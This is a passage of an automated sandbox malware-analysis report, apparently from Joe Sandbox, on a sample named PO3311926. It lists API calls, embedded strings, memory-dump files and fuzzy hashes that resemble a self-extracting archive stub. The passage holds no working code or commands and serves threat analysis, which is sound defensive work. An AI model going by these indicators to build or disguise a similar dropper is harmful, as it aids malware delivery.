                                                                                              • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                              • Instruction Fuzzy Hash: A331E7B1A147468FCB14DF28C8911BEBBE0FB95704F10456DE495C7742C779EA0ACBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BBC744
                                                                                                • Part of subcall function 00BBB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00BBB3FB
                                                                                              • _wcslen.LIBCMT ref: 00BBCA0A
                                                                                              • _wcslen.LIBCMT ref: 00BBCA13
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00BBCA71
                                                                                              • _wcslen.LIBCMT ref: 00BBCAB3
                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00BBCBFB
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00BBCC36
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00BBCC46
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00BEA472), ref: 00BBCC54
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BBCC7F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 2804936435-312220925
                                                                                              • Opcode ID: 6ff1740d797c882b1d111ad7fe6bb70f23874ef12a1282e2c4b0e9df6a1763e1
                                                                                              • Instruction ID: 5c0fb4670d8ed065da0e04221415d43477e2fedb631ef994ded6e2bec7603785
                                                                                              • Opcode Fuzzy Hash: 6ff1740d797c882b1d111ad7fe6bb70f23874ef12a1282e2c4b0e9df6a1763e1
                                                                                              • Instruction Fuzzy Hash: 27E13F72900259ABDB25DBA0DC95EFE77FCEB04750F4080E6F649E3051EBB49A848B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00BAE30E
                                                                                                • Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5
                                                                                                • Part of subcall function 00BB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00BE1030,?,00BAD928,00000000,?,00000050,00BE1030), ref: 00BB1DC4
                                                                                              • _strlen.LIBCMT ref: 00BAE32F
                                                                                              • SetDlgItemTextW.USER32(?,00BDE274,?), ref: 00BAE38F
                                                                                              • GetWindowRect.USER32(?,?), ref: 00BAE3C9
                                                                                              • GetClientRect.USER32(?,?), ref: 00BAE3D5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BAE475
                                                                                              • GetWindowRect.USER32(?,?), ref: 00BAE4A2
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00BAE4DB
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00BAE4E3
                                                                                              • GetWindow.USER32(?,00000005), ref: 00BAE4EE
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00BAE51B
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00BAE58D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d
                                                                                              • API String ID: 2407758923-2512411981
                                                                                              • Opcode ID: e2b24ebf71a062909c80c86712b23e09dbd36898d5bb8d4c425f13acae76a2f8
                                                                                              • Instruction ID: 6587ae6a738ad4e9c2673f90122ddae33d74a78d666fe114a4111ec5567d0602
                                                                                              • Opcode Fuzzy Hash: e2b24ebf71a062909c80c86712b23e09dbd36898d5bb8d4c425f13acae76a2f8
                                                                                              • Instruction Fuzzy Hash: A381BE72608341AFD710DFA8CC89B6FBBEDEB89704F05092DFA95A7250D630E905CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 00BCCB66
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC71E
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC730
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC742
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC754
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC766
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC778
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC78A
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC79C
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC7AE
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC7C0
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC7D2
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC7E4
                                                                                                • Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC7F6
                                                                                              • _free.LIBCMT ref: 00BCCB5B
                                                                                                • Part of subcall function 00BC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?), ref: 00BC8DE2
                                                                                                • Part of subcall function 00BC8DCC: GetLastError.KERNEL32(?,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?,?), ref: 00BC8DF4
                                                                                              • _free.LIBCMT ref: 00BCCB7D
                                                                                              • _free.LIBCMT ref: 00BCCB92
                                                                                              • _free.LIBCMT ref: 00BCCB9D
                                                                                              • _free.LIBCMT ref: 00BCCBBF
                                                                                              • _free.LIBCMT ref: 00BCCBD2
                                                                                              • _free.LIBCMT ref: 00BCCBE0
                                                                                              • _free.LIBCMT ref: 00BCCBEB
                                                                                              • _free.LIBCMT ref: 00BCCC23
                                                                                              • _free.LIBCMT ref: 00BCCC2A
                                                                                              • _free.LIBCMT ref: 00BCCC47
                                                                                              • _free.LIBCMT ref: 00BCCC5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: 265201387fd9c2f31a059b8162a5082b2d7940754ad43d3e6dc2151640f03288
                                                                                              • Instruction ID: af4074a303af8b6a35b2bf303a8f20222c4f6833e6d2a879d652c611b6f04b81
                                                                                              • Opcode Fuzzy Hash: 265201387fd9c2f31a059b8162a5082b2d7940754ad43d3e6dc2151640f03288
                                                                                              • Instruction Fuzzy Hash: 92313B316042099FEB21AA78E846F5BBBE9EF20310F1554AEE59DD7192DF35EC40CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 00BBD6C1
                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00BBD6ED
                                                                                                • Part of subcall function 00BB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BAC116,00000000,.exe,?,?,00000800,?,?,?,00BB8E3C), ref: 00BB1FD1
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00BBD709
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00BBD720
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00BBD734
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00BBD75D
                                                                                              • DeleteObject.GDI32(00000000), ref: 00BBD764
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00BBD76D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 3820355801-1882779555
                                                                                              • Opcode ID: a263f05cc77e20386a2dc5ff99f0043cf2e7ad6d5c320b69cfa51b5315193ce8
                                                                                              • Instruction ID: 6588fefd4b3d19f35f518c24278f1718c7a065717b11113e80546ab4f92b1fde
                                                                                              • Opcode Fuzzy Hash: a263f05cc77e20386a2dc5ff99f0043cf2e7ad6d5c320b69cfa51b5315193ce8
                                                                                              • Instruction Fuzzy Hash: FD1121726013507BE2216B719C4AFFF76DCEB14701F014161FA02A60A1EBE8CF0586B5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00BC9705
                                                                                                • Part of subcall function 00BC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?), ref: 00BC8DE2
                                                                                                • Part of subcall function 00BC8DCC: GetLastError.KERNEL32(?,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?,?), ref: 00BC8DF4
                                                                                              • _free.LIBCMT ref: 00BC9711
                                                                                              • _free.LIBCMT ref: 00BC971C
                                                                                              • _free.LIBCMT ref: 00BC9727
                                                                                              • _free.LIBCMT ref: 00BC9732
                                                                                              • _free.LIBCMT ref: 00BC973D
                                                                                              • _free.LIBCMT ref: 00BC9748
                                                                                              • _free.LIBCMT ref: 00BC9753
                                                                                              • _free.LIBCMT ref: 00BC975E
                                                                                              • _free.LIBCMT ref: 00BC976C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: b91432e27d157648456428ff85df2d5d2f44a52b693d54e7a75850b5b8730838
                                                                                              • Instruction ID: 70c36d7e8d0054a98380e0ccee17eb05df58d62cd6200a57fab7e43e2feee4a3
                                                                                              • Opcode Fuzzy Hash: b91432e27d157648456428ff85df2d5d2f44a52b693d54e7a75850b5b8730838
                                                                                              • Instruction Fuzzy Hash: 5A11B376110109BFDB01EF98D882EDD3BB5EF14350B5254E9FA498F262DE32EE509B84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 322700389-393685449
                                                                                              • Opcode ID: b5c922b0f6261b7d6b8e3306939694d256c2d57804fa6c3ac51e50577d7fba19
                                                                                              • Instruction ID: d9aed2e94d997b51dd1e2b8172d04f6144f64f5eda749f172262d5268d0f117c
                                                                                              • Opcode Fuzzy Hash: b5c922b0f6261b7d6b8e3306939694d256c2d57804fa6c3ac51e50577d7fba19
                                                                                              • Instruction Fuzzy Hash: FDB12571900209EFCF29DFA4C881EAEBBF5EF14710B58819EF8156B212D735DA61CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BA6FAA
                                                                                              • _wcslen.LIBCMT ref: 00BA7013
                                                                                              • _wcslen.LIBCMT ref: 00BA7084
                                                                                                • Part of subcall function 00BA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BA7AAB
                                                                                                • Part of subcall function 00BA7A9C: GetLastError.KERNEL32 ref: 00BA7AF1
                                                                                                • Part of subcall function 00BA7A9C: CloseHandle.KERNEL32(?), ref: 00BA7B00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 3122303884-3508440684
                                                                                              • Opcode ID: 4fe7804636451ecc28696e7e444e71daf48779791dca8d17102c6bb12abcabd7
                                                                                              • Instruction ID: 494d865fe31e0d55f00f4a614f3de3c895241473a594704aacf7d77f441ac92a
                                                                                              • Opcode Fuzzy Hash: 4fe7804636451ecc28696e7e444e71daf48779791dca8d17102c6bb12abcabd7
                                                                                              • Instruction Fuzzy Hash: 0041B3B1D4C744BAEB21A7749C82FEEB7E8DB06704F0044D5F955A6182EA74AA448721
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00BB9736
                                                                                              • _wcslen.LIBCMT ref: 00BB97D6
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00BB97E5
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00BB9806
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                              • API String ID: 1116704506-4209811716
                                                                                              • Opcode ID: e508958bc2a1c2d44b3053cf29e60af31972bb427036e044c3133b3ae57f0686
                                                                                              • Instruction ID: 3e1ad6b89fb2810361c434eb7137cc15b125cb9bc7229152f7d6bae876b08f30
                                                                                              • Opcode Fuzzy Hash: e508958bc2a1c2d44b3053cf29e60af31972bb427036e044c3133b3ae57f0686
                                                                                              • Instruction Fuzzy Hash: 583115321083127BD725AB259C46FBBB7D8EF52750F14019EF601961D2FFA49A0483A6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
                                                                                                • Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00BBB610
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00BBB637
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00BBB650
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00BBB661
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00BBB66A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00BBB67E
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00BBB694
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                              • String ID: LICENSEDLG
                                                                                              • API String ID: 3214253823-2177901306
                                                                                              • Opcode ID: 9b67c27819b1762564e35f76c20262ce186342200adca9afd703c1d5b87f1483
                                                                                              • Instruction ID: c1afcca77030aff2bae6d2a4c77caf8a3e5282ce464f3114d23e634c6312a0ca
                                                                                              • Opcode Fuzzy Hash: 9b67c27819b1762564e35f76c20262ce186342200adca9afd703c1d5b87f1483
                                                                                              • Instruction Fuzzy Hash: 3021D332204219BBD6215F66ED89FBF7BADEB4AB45F020054F606A70A0CFD29D01D635
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,BCD48ACC,00000001,00000000,00000000,?,?,00BAAF6C,ROOT\CIMV2), ref: 00BBFD99
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00BAAF6C,ROOT\CIMV2), ref: 00BBFE14
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00BBFE1F
                                                                                              • _com_issue_error.COMSUPP ref: 00BBFE48
                                                                                              • _com_issue_error.COMSUPP ref: 00BBFE52
                                                                                              • GetLastError.KERNEL32(80070057,BCD48ACC,00000001,00000000,00000000,?,?,00BAAF6C,ROOT\CIMV2), ref: 00BBFE57
                                                                                              • _com_issue_error.COMSUPP ref: 00BBFE6A
                                                                                              • GetLastError.KERNEL32(00000000,?,?,00BAAF6C,ROOT\CIMV2), ref: 00BBFE80
                                                                                              • _com_issue_error.COMSUPP ref: 00BBFE93
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                              • String ID:
                                                                                              • API String ID: 1353541977-0
                                                                                              • Opcode ID: c2938d308179a8464447bd62667e442767d1087faf86ca9515f5bd841a67677c
                                                                                              • Instruction ID: 125c543d9d877874c9cbe0f08b3c790d5907108bed6d650a69febb401c2058be
                                                                                              • Opcode Fuzzy Hash: c2938d308179a8464447bd62667e442767d1087faf86ca9515f5bd841a67677c
                                                                                              • Instruction Fuzzy Hash: 0B41C971A00216ABDB109F68CC45BFEFBE8EB48B10F1082BAF915E7251DB75D940C7A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                              • API String ID: 3519838083-3505469590
                                                                                              • Opcode ID: 6e0df7213842721af5001d7fddabe500baaf86ed2041fb3decab727d809d4039
                                                                                              • Instruction ID: 2be76485e55ded6af8ad9ca3828172bfb7f5d8c8b1b0c3dfc4b4eebe759a25e3
                                                                                              • Opcode Fuzzy Hash: 6e0df7213842721af5001d7fddabe500baaf86ed2041fb3decab727d809d4039
                                                                                              • Instruction Fuzzy Hash: 61715971A00219AFDF24DFA4C895DAEB7F9FF49710B14019EE512E72A1DB31AE01CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BA9387
                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00BA93AA
                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00BA93C9
                                                                                                • Part of subcall function 00BAC29A: _wcslen.LIBCMT ref: 00BAC2A2
                                                                                                • Part of subcall function 00BB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BAC116,00000000,.exe,?,?,00000800,?,?,?,00BB8E3C), ref: 00BB1FD1
                                                                                              • _swprintf.LIBCMT ref: 00BA9465
                                                                                                • Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00BA94D4
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00BA9514
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
